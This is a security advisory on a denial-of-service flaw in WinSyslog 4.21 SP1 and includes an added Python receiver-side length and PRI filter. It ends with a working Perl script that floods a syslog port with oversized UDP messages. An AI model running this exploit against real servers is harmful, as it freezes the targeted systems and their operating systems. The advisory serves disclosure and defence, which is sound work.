Security Vulnerability in WinSyslog (DoS)

Summary

WinSyslog is "an enhanced syslog server for Windows". A vulnerability in the product allows remote attackers to cause WinSyslog to freeze, which in turn also freezes the operating system on which the product runs.

Credit:

SecurITeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable version:
 * WinSyslog version 4.21 SP1

By sending arbitrarily long Syslog messages to the WinSyslog program, it is possible to cause it to freeze. When WinSyslog freezes, the whole operating system freezes with it.

Vendor response:
See "Potential DoS in Interactive Syslog Server" for the official vendor response.
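A receiver-side length and PRI check, as an added example that is not part of the original advisory and is not the vendor's fix: it drops datagrams such as the ones the proof-of-concept on this page sends (4-byte "<00>" header plus 2400 or more bytes of padding) before any further parsing. The 1024-byte cap comes from RFC 3164 section 4.1; the function names, the bind address and the sample messages are assumptions made for illustration.

```python
import re
import socket

MAX_SYSLOG_LEN = 1024                    # RFC 3164 section 4.1: packet MUST be <= 1024 bytes
PRI_RE = re.compile(rb"^<(\d{1,3})>")    # PRI part: 1 to 3 digits in angle brackets


def check_datagram(data: bytes, max_len: int = MAX_SYSLOG_LEN):
    """Return ("accept", facility, severity, text) or ("drop", reason)."""
    # Length is checked first, so oversized input never reaches the parser.
    if len(data) > max_len:
        return ("drop", f"oversized: {len(data)} > {max_len} bytes")
    m = PRI_RE.match(data)
    if not m or int(m.group(1)) > 191:   # highest valid PRI is 23 * 8 + 7
        return ("drop", "missing or invalid PRI")
    pri = int(m.group(1))
    text = data[m.end():].decode("ascii", errors="replace")
    return ("accept", pri >> 3, pri & 7, text)


def serve(bind_addr: str = "127.0.0.1", port: int = 10514, handler=print):
    """Receive loop (hypothetical wiring): every datagram is vetted before use."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_addr, port))
    while True:
        # Buffer sized for the largest UDP datagram, so nothing is silently truncated
        # and the real length is what gets compared against the cap.
        data, peer = sock.recvfrom(65535)
        handler(peer, check_datagram(data))


if __name__ == "__main__":
    # Constructed samples: one ordinary message, then the smallest and largest
    # datagram sizes the advisory's script produces (counts 0 and 999).
    samples = [
        b"<34>Oct 11 22:14:15 mymachine su: test",
        b"<00>" + b"A" * ((600 + 0) * 4),
        b"<00>" + b"A" * ((600 + 999) * 4),
    ]
    for s in samples:
        print(len(s), check_datagram(s))
```

Counting "oversized" verdicts per source address gives a simple detection signal for this kind of traffic.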

Exploit:
#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = '192.168.1.44';
$port = '10514';
$data = 'A';

$socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count ++) {
$buf = '<00>';
$buf .= 'A'x((600+$count)*4);

print "Length: ", length($buf), "\n";
send($socket, $buf, 0, $portaddr);
print "sent\n";
}

print "Done\n";
